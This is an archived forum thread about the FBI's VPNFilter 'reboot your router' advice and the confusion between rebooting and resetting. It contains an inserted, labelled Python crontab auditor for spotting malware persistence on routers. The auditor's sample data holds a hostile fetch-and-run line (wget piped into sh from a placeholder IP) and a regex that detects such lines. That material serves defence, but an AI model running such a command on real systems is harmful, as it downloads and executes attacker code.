National Reboot your Router Day

Thanks to media attention, the FBI has provided me with a busy day or two. According to the press release, we're expected to reboot every router to flush out the malware the evil Russians have installed: The list of affected routers is rather small: Easy enough. What could possibly go wrong?

Well, some experts, news agencies, and pundits have mixed up "reboot" with "reset" your router[1]. Instructions are provided for inserting paper clips and sharp instruments into any available hole in the back of the router. Few seem to offer assistance in identifying which box is the router. Doing a reboot will preserve the router settings. Doing a reset will wipe them clean and precipitate a support call (to me). So far, I only have 2 router reconfigurations on my schedule for today, but I'm sure there will be more.

Therefore, I would like to thank everyone involved for generating the work, and special thanks to Comcast and AT&T for disabling customer firmware updates and save settings in their gateways and routers.

Update: I just received a phone call asking which box is the router. This is going to be an interesting day.

[1] The probable culprit is the various Comcast VoIP gateways that have an optional built in backup battery. In order to reboot these, it is necessary to unplug the power from the gateway, remove the battery for about 15 seconds, plug the battery back in, plug the power back in, and watch the lights come sloooooowly back on.
--
Jeff Liebermann     jeffl@cruzio.com 
150 Felker St #D    http://www.LearnByDestroying.com 

Watched the local news last night; anyone following their instructions will *reset* his router to the defaults.

See the "Gell-Mann Amnesia Effect" for further details.

Jerry Peters

I'm not bothered if the Russians hack my route (as if!) - there's far worse than them out there.

--
This message may be freely reproduced without limit or charge only via  
the Usenet protocol. Reproduction in whole or part through other  
Cursitor Doom

All the weekly attempts to log into my server traceroute back to China, not Russia. I suppose it could be those fiendishly clever Russians spoofing, of course.

Fred Smith

Yep. That's because the average reporter or announcer doesn't know the difference between reboot, reset, restart, power cycle, cold boot, hot boot, etc. Little surprise because the older computahs had a button labeled "reset" that did a "reboot". However, when the button moved to modems and routers, it did both a reset (wipe all settings), and a reboot (restart the OS). I partly solved the problem by covering the hole with a round label inscribed with "$35" which is what it will cost them to have me drive over to their office and put Humpty Dumpty back together again.

Of course, nothing happens without a suitable conspiracy theory. In this case, I must ask why the FBI insisted that everyone reset their routers when only a few models are susceptible. Also, ISPs like AT&T can easily reboot their customers' routers using SNMP. My initial guess was that the FBI thought it better to be sure than sorry when dealing with credential-sniffing malware. However, the FBI has never been known for such lofty sentiments. My guess(tm) is that this may well be the first technical action in recent memory that the FBI has performed mostly correctly. They may need the good publicity it brings to compensate for the general impression of gross incompetence demonstrated by the Apple iPhone unlocking fiasco.

Unfortunately, my prediction of personal economic enrichment may have been premature. National Reboot Your Router Day has produced only two paying service calls and a few unprofitable phone calls and emails. Very disappointing. Still, I predict additional press releases in the future by the FBI to remind us that we're being successfully protected from the machinations of the Russians.

Jeff Liebermann

No need to hack your own route. Just use the "route" command to direct your packets to wherever you want:

Most automated attacks arrive from hijacked client computers or botnets. For DDoS attacks, it looks like attacks originating in the USA are the major culprits, with China in 2nd place: More of the same: etc...

Jeff Liebermann

You don't charge enough. It costs 3-4 times that to have a plumber call.

More likely the FBI is helping the NSA install their own sniffers into every router that gets rebooted, and not just the vulnerable ones. Of course, that theory presumes competence, so it's probably wrong.

Clifford Heath

Also: "Cisco said part of the code used by VPNFilter can still persist until the affected device is reset to its factory-default settings."

So a reset actually might be required.

> Little surprise because the older computahs had a

Clifford Heath

Or some 400 lb guy living in his mother's basement. ;-)

--
"I am a river to my people." 
Jeff-1.0 
Fox's Mercantile

> this case, I must ask why the FBI insisted that everyone reset their routers when only a few models are susceptible.

They insisted ? Fukum, I didn't do it. Hold on, there's a knock at the door ...

...

...

Don't worry, I shot them. Now, is this possibly the cause of my having trouble getting to certain sites? These are mainly sites I have never been to before. Everything I normally use is all right, but anything new seems to time out, and that is in more than one browser.

Maybe some DNSes got screwed up or something like that, but the places I frequent have a backup somewhere?

jurb6006

You're right. Here's the source of the Cisco recommendation: See "Stage 1 (Persistent Loader)" section: VPNFilter's stage 1 malware infects devices running firmware based on Busybox and Linux, and is compiled for several CPU architectures. The main purpose of these first-stage binaries is to locate a server providing a more fully featured second stage, and to download and maintain persistence for this next stage on infected devices. It is capable of modifying non-volatile configuration memory (NVRAM) values and adds itself to crontab, the Linux job scheduler, to achieve persistence.

So, it looks like I might be doing some reset to defaults and firmware updates on affected routers. The crontab file is probably in the firmware. Argh.

Incidentally, of the two customers who reset their routers to defaults, I was able to recover by walking them through the initial setup to get their device on the internet, and then restoring their saved settings, which I save for every router I configure. I didn't charge either customer if they promised to never do that again. However, if they're on the affected router list, I'll need to visit them and update the firmware.

Jeff Liebermann
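An added example, not part of the thread and not anything from Cisco Talos: a Python check that parses a BusyBox-style crontab (the text it would be fed is what `cat /etc/crontabs/root` returns on many BusyBox routers; that path is an assumption) and flags entries with the traits a persistence entry of the kind the Talos excerpt above describes would tend to have. The sample crontab, the baseline of expected binaries, and the paths /var/run/.update and /tmp/.x/launch are constructed for illustration only and are not VPNFilter indicators.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: roughly what `cat /etc/crontabs/root` returns on a
# BusyBox router. The last three entries are made up to exercise the checks;
# they are NOT real VPNFilter artefacts.
SAMPLE_CRONTAB = """\
# min hour dom mon dow command
0 3 * * * /sbin/logrotate
*/10 * * * * /usr/sbin/ntpclient -s -h pool.ntp.org
*/5 * * * * /var/run/.update -c
@reboot /tmp/.x/launch >/dev/null 2>&1
0 * * * * wget -q -O - http://198.51.100.7/s | sh
"""

# Assumption: on typical BusyBox routers these trees are RAM-backed or
# writable at runtime, so a binary living there was not shipped in the
# read-only firmware image.
VOLATILE_OR_WRITABLE = ("/tmp/", "/var/", "/dev/shm/", "/mnt/")

# Hypothetical per-model baseline: binaries the vendor's own crontab runs.
# In practice this comes from a clean firmware image of the same version.
BASELINE = {"/sbin/logrotate", "/usr/sbin/ntpclient"}

# "fetch something and pipe it into a shell" in one cron line.
DOWNLOAD_AND_RUN = re.compile(r"\b(wget|curl|tftp)\b.*\|\s*(sh|ash|bash)\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list = field(default_factory=list)


def split_entry(line):
    """Return (schedule, command) for a cron entry, or None for comments,
    blank lines, environment assignments and malformed entries."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                 # @reboot, @daily, ... (1 field)
        parts = line.split(None, 1)
    else:                                    # classic 5-field schedule
        parts = line.split(None, 5)
        if len(parts) < 6:
            return None
        parts = [" ".join(parts[:5]), parts[5]]
    if len(parts) != 2:
        return None
    return parts[0], parts[1]


def audit_crontab(text):
    """Return a Finding for every entry that shows at least one suspicious
    trait; entries matching the baseline and none of the checks are silent."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        entry = split_entry(raw)
        if entry is None:
            continue
        schedule, command = entry
        binary = command.split()[0]
        reasons = []
        if binary.startswith(VOLATILE_OR_WRITABLE):
            reasons.append("binary lives in volatile/writable path")
        if any(seg.startswith(".") for seg in binary.split("/") if seg):
            reasons.append("hidden path component")
        if DOWNLOAD_AND_RUN.search(command):
            reasons.append("download piped into shell")
        if binary.startswith("/"):
            if binary not in BASELINE:
                reasons.append("not in firmware baseline")
        else:
            reasons.append("relative command (resolved via PATH)")
        if reasons:
            findings.append(Finding(n, schedule, command, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.schedule}] {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a live device, pipe the real crontab in instead of the constructed sample and build BASELINE from a clean image of the same firmware version; a clean crontab with only vendor entries should produce no findings. The crontab is only one of the two persistence points the excerpt names; the NVRAM side has to be compared against a known-good dump with whatever the firmware provides for that (some Broadcom-based firmware exposes `nvram show`), which this example does not attempt.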

The list of potentially affected routers has been expanded by Cisco:

Jeff Liebermann

ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.